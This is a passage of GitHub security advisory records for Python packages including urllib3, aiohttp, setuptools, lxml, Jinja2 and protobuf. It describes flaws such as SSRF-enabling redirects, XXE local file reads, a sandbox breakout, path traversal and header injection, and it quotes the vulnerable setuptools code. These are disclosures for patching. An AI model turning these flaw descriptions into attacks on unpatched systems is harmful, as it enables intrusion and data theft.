"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP has a Multipart Header Size Bypass"
}
GHSA-PQ67-6M6Q-MJ2V
Vulnerability from github – Published: 2025-06-18 17:50 – Updated: 2025-12-22 21:33urllib3 handles redirects and retries using the same mechanism, which is controlled by the Retry object. The most common way to disable redirects is at the request level, as follows:
resp = urllib3.request("GET", "https://httpbin.org/redirect/1", redirect=False)
print(resp.status)
# 302
However, it is also possible to disable redirects, for all requests, by instantiating a PoolManager and specifying retries in a way that disable redirects:
import urllib3
http = urllib3.PoolManager(retries=0) # should raise MaxRetryError on redirect
http = urllib3.PoolManager(retries=urllib3.Retry(redirect=0)) # equivalent to the above
http = urllib3.PoolManager(retries=False) # should return the first response
resp = http.request("GET", "https://httpbin.org/redirect/1")
However, the retries parameter is currently ignored, which means all the above examples don't disable redirects.
Affected usages
Passing retries on PoolManager instantiation to disable redirects or restrict their number.
By default, requests and botocore users are not affected.
Impact
Redirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable.
Remediation
You can remediate this vulnerability with the following steps:
- Upgrade to a patched version of urllib3. If your organization would benefit from the continued support of urllib3 1.x, please contact sethmichaellarson@gmail.com to discuss sponsorship or contribution opportunities.
- Disable redirects at the
request()level instead of thePoolManager()level.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-50181"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-18T17:50:00Z",
"nvd_published_at": "2025-06-19T01:15:24Z",
"severity": "MODERATE"
},
"details": "urllib3 handles redirects and retries using the same mechanism, which is controlled by the `Retry` object. The most common way to disable redirects is at the request level, as follows:\n\n```python\nresp = urllib3.request(\"GET\", \"https://httpbin.org/redirect/1\", redirect=False)\nprint(resp.status)\n# 302\n```\n\nHowever, it is also possible to disable redirects, for all requests, by instantiating a `PoolManager` and specifying `retries` in a way that disable redirects:\n\n```python\nimport urllib3\n\nhttp = urllib3.PoolManager(retries=0) # should raise MaxRetryError on redirect\nhttp = urllib3.PoolManager(retries=urllib3.Retry(redirect=0)) # equivalent to the above\nhttp = urllib3.PoolManager(retries=False) # should return the first response\n\nresp = http.request(\"GET\", \"https://httpbin.org/redirect/1\")\n```\n\nHowever, the `retries` parameter is currently ignored, which means all the above examples don\u0027t disable redirects.\n\n## Affected usages\n\nPassing `retries` on `PoolManager` instantiation to disable redirects or restrict their number.\n\nBy default, requests and botocore users are not affected.\n\n## Impact\n\nRedirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable.\n\n## Remediation\n\nYou can remediate this vulnerability with the following steps:\n\n * Upgrade to a patched version of urllib3. If your organization would benefit from the continued support of urllib3 1.x, please contact [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com) to discuss sponsorship or contribution opportunities.\n * Disable redirects at the `request()` level instead of the `PoolManager()` level.",
"id": "GHSA-pq67-6m6q-mj2v",
"modified": "2025-12-22T21:33:21Z",
"published": "2025-06-18T17:50:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
},
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
},
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation"
}
GHSA-C427-H43C-VF67
Vulnerability from github – Published: 2026-04-01 21:49 – Updated: 2026-04-01 21:49Summary
Multiple Host headers were allowed in aiohttp.
Impact
Mostly this doesn't affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using Application.add_domain().
Patch: https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349 Patch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34525"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:49:45Z",
"nvd_published_at": "2026-04-01T21:17:00Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nMultiple Host headers were allowed in aiohttp.\n\n### Impact\n\nMostly this doesn\u0027t affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using `Application.add_domain()`.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349\nPatch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000",
"id": "GHSA-c427-h43c-vf67",
"modified": "2026-04-01T21:49:45Z",
"published": "2026-04-01T21:49:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34525"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP accepts duplicate Host headers"
}
GHSA-5RJG-FVGR-3XXF
Vulnerability from github – Published: 2025-05-19 16:52 – Updated: 2025-06-13 04:13Summary
A path traversal vulnerability in PackageIndex was fixed in setuptools version 78.1.1
Details
def _download_url(self, url, tmpdir):
# Determine download filename
#
name, _fragment = egg_info_for_url(url)
if name:
while '..' in name:
name = name.replace('..', '.').replace('\\', '_')
else:
name = "__downloaded__" # default if URL has no path contents
if name.endswith('.[egg.zip](http://egg.zip/)'):
name = name[:-4] # strip the extra .zip before download
--> filename = os.path.join(tmpdir, name)
Here: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88
os.path.join() discards the first argument tmpdir if the second begins with a slash or drive letter.
name is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of '..' with '.', it is insufficient.
Risk Assessment
As easy_install and package_index are deprecated, the exploitation surface is reduced. However, it seems this could be exploited in a similar fashion like https://github.com/advisories/GHSA-r9hx-vwmv-q579, and as described by POC 4 in https://github.com/advisories/GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index.
Impact
An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context.
References
https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5 https://github.com/pypa/setuptools/issues/4946
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "setuptools"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "78.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-47273"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-19T16:52:43Z",
"nvd_published_at": "2025-05-17T16:15:19Z",
"severity": "HIGH"
},
"details": "### Summary \nA path traversal vulnerability in `PackageIndex` was fixed in setuptools version 78.1.1\n\n### Details\n```\n def _download_url(self, url, tmpdir):\n # Determine download filename\n #\n name, _fragment = egg_info_for_url(url)\n if name:\n while \u0027..\u0027 in name:\n name = name.replace(\u0027..\u0027, \u0027.\u0027).replace(\u0027\\\\\u0027, \u0027_\u0027)\n else:\n name = \"__downloaded__\" # default if URL has no path contents\n\n if name.endswith(\u0027.[egg.zip](http://egg.zip/)\u0027):\n name = name[:-4] # strip the extra .zip before download\n\n --\u003e filename = os.path.join(tmpdir, name)\n```\n\nHere: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88\n\n`os.path.join()` discards the first argument `tmpdir` if the second begins with a slash or drive letter.\n`name` is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of \u0027..\u0027 with \u0027.\u0027, it is insufficient.\n\n### Risk Assessment\nAs easy_install and package_index are deprecated, the exploitation surface is reduced.\nHowever, it seems this could be exploited in a similar fashion like https://github.com/advisories/GHSA-r9hx-vwmv-q579, and as described by POC 4 in https://github.com/advisories/GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index.\n\n### Impact\nAn attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context.\n\n### References\nhttps://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5\nhttps://github.com/pypa/setuptools/issues/4946",
"id": "GHSA-5rjg-fvgr-3xxf",
"modified": "2025-06-13T04:13:22Z",
"published": "2025-05-19T16:52:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47273"
},
{
"type": "WEB",
"url": "https://github.com/pypa/setuptools/issues/4946"
},
{
"type": "WEB",
"url": "https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/pypa/setuptools"
},
{
"type": "WEB",
"url": "https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "setuptools has a path traversal vulnerability in PackageIndex.download that leads to Arbitrary File Write"
}
GHSA-VFMQ-68HX-4JFW
Vulnerability from github – Published: 2026-04-21 20:38 – Updated: 2026-06-06 00:59Impact
Using either of the two parsers in the default configuration (with resolve_entities=True) allows untrusted XML input to read local files.
Patches
lxml 6.1.0 changes the default to resolve_entities='internal', thus disallowing local file access by default.
Workarounds
Setting the resolve_entities option explicitly to resolve_entities='internal' or resolve_entities=False disables the local file access.
Resources
Original report: https://bugs.launchpad.net/lxml/+bug/2146291
The default option was changed to resolve_entities='internal' for the normal XML and HTML parsers in lxml 5.0. The default was not changed for iterparse() and ETCompatXMLParser() at the time. lxml 6.1 makes the safe option the default for all parsers.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lxml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41066"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T20:38:44Z",
"nvd_published_at": "2026-04-24T17:16:20Z",
"severity": "HIGH"
},
"details": "### Impact\nUsing either of the two parsers in the default configuration (with `resolve_entities=True`) allows untrusted XML input to read local files.\n\n### Patches\nlxml 6.1.0 changes the default to `resolve_entities=\u0027internal\u0027`, thus disallowing local file access by default.\n\n### Workarounds\nSetting the `resolve_entities` option explicitly to `resolve_entities=\u0027internal\u0027` or `resolve_entities=False` disables the local file access.\n\n### Resources\nOriginal report: https://bugs.launchpad.net/lxml/+bug/2146291\n\nThe default option was changed to `resolve_entities=\u0027internal\u0027` for the normal XML and HTML parsers in lxml 5.0. The default was not changed for `iterparse()` and `ETCompatXMLParser()` at the time. lxml 6.1 makes the safe option the default for all parsers.",
"id": "GHSA-vfmq-68hx-4jfw",
"modified": "2026-06-06T00:59:15Z",
"published": "2026-04-21T20:38:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lxml/lxml/security/advisories/GHSA-vfmq-68hx-4jfw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41066"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/lxml/+bug/2146291"
},
{
"type": "PACKAGE",
"url": "https://github.com/lxml/lxml"
},
{
"type": "WEB",
"url": "https://github.com/lxml/lxml/releases/tag/lxml-6.1.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/lxml/PYSEC-2026-87.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "lxml: Default configuration of iterparse() and ETCompatXMLParser() allows XXE to local files"
}
GHSA-FH55-R93G-J68G
Vulnerability from github – Published: 2026-01-05 23:13 – Updated: 2026-01-06 16:07Summary
Reading multiple invalid cookies can lead to a logging storm.
Impact
If the cookies attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.
Patch: https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.2"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69230"
],
"database_specific": {
"cwe_ids": [
"CWE-779"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T23:13:46Z",
"nvd_published_at": "2026-01-06T00:15:48Z",
"severity": "LOW"
},
"details": "### Summary\nReading multiple invalid cookies can lead to a logging storm.\n\n### Impact\nIf the ``cookies`` attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326",
"id": "GHSA-fh55-r93g-j68g",
"modified": "2026-01-06T16:07:02Z",
"published": "2026-01-05T23:13:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69230"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP Vulnerable to Cookie Parser Warning Storm"
}
GHSA-3WQ7-RQQ7-WX6J
Vulnerability from github – Published: 2026-04-01 21:47 – Updated: 2026-04-01 21:47Summary
For some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.
Impact
If an application uses Request.post() an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.
Patch: https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34517"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:47:07Z",
"nvd_published_at": "2026-04-01T21:16:59Z",
"severity": "LOW"
},
"details": "### Summary\n\nFor some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.\n\n### Impact\n\nIf an application uses `Request.post()` an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145",
"id": "GHSA-3wq7-rqq7-wx6j",
"modified": "2026-04-01T21:47:07Z",
"published": "2026-04-01T21:47:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34517"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP has late size enforcement for non-file multipart fields causes memory DoS"
}
GHSA-Q2X7-8RV6-6Q7H
Vulnerability from github – Published: 2024-12-23 17:56 – Updated: 2025-11-03 22:50An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code.
To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.
Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4"
},
"package": {
"ecosystem": "PyPI",
"name": "jinja2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-56326"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-23T17:56:08Z",
"nvd_published_at": "2024-12-23T16:15:07Z",
"severity": "MODERATE"
},
"details": "An oversight in how the Jinja sandboxed environment detects calls to `str.format` allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja\u0027s sandbox does catch calls to `str.format` and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to store a reference to a malicious string\u0027s `format` method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox.",
"id": "GHSA-q2x7-8rv6-6q7h",
"modified": "2025-11-03T22:50:50Z",
"published": "2024-12-23T17:56:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56326"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/jinja"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Jinja has a sandbox breakout through indirect reference to format method"
}
GHSA-G84X-MCQJ-X9QQ
Vulnerability from github – Published: 2026-01-05 23:13 – Updated: 2026-01-06 16:06Summary
Handling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.
Impact
If an application makes use of the request.read() method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time.
Patch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712 Patch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.2"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69229"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T23:13:29Z",
"nvd_published_at": "2026-01-06T00:15:48Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nHandling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.\n\n### Impact\n\nIf an application makes use of the `request.read()` method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712\nPatch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229",
"id": "GHSA-g84x-mcqj-x9qq",
"modified": "2026-01-06T16:06:58Z",
"published": "2026-01-05T23:13:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69229"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP vulnerable to DoS through chunked messages"
}
GHSA-7GCM-G887-7QV7
Vulnerability from github – Published: 2026-01-23 15:31 – Updated: 2026-02-05 15:47A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.
Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.33.4"
},
"package": {
"ecosystem": "PyPI",
"name": "protobuf"
},
"ranges": [
{
"events": [
{
"introduced": "6.30.0rc1"
},
{
"fixed": "6.33.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "protobuf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.29.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-0994"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-23T16:56:33Z",
"nvd_published_at": "2026-01-23T15:16:06Z",
"severity": "HIGH"
},
"details": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python\u2019s recursion stack and causing a RecursionError.",
"id": "GHSA-7gcm-g887-7qv7",
"modified": "2026-02-05T15:47:43Z",
"published": "2026-01-23T15:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0994"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/issues/25070"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/pull/25239"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"
},
{
"type": "PACKAGE",
"url": "https://github.com/protocolbuffers/protobuf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L",
"type": "CVSS_V4"
}
],
"summary": "protobuf affected by a JSON recursion depth bypass"
}
GHSA-2VRM-GR82-F7M5
Vulnerability from github – Published: 2026-04-01 21:20 – Updated: 2026-04-06 16:46Summary
An attacker who controls the content_type parameter in aiohttp could use this to inject extra headers or similar exploits.
Impact
If an application allows untrusted data to be used for the multipart content_type parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.
Patch: https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34514"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:20:06Z",
"nvd_published_at": "2026-04-01T21:16:59Z",
"severity": "LOW"
},
"details": "### Summary\n\nAn attacker who controls the `content_type` parameter in aiohttp could use this to inject extra headers or similar exploits.\n\n### Impact\n\nIf an application allows untrusted data to be used for the multipart `content_type` parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06",
"id": "GHSA-2vrm-gr82-f7m5",
"modified": "2026-04-06T16:46:49Z",
"published": "2026-04-01T21:20:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34514"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP has CRLF injection through multipart part content type header construction"
}
GHSA-27JP-WM6Q-GP25
Vulnerability from github – Published: 2026-02-13 16:16 – Updated: 2026-02-13 16:16Summary
The below gist hangs while attempting to format a long list of tuples.
This was found while drafting a regression test for Dja ngo 5.2's composite primary key feature, which allows querying composite fields with tuples.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.3"
},
"package": {
"ecosystem": "PyPI",
"name": "sqlparse"
},
"ranges": [
{
"events": [
{
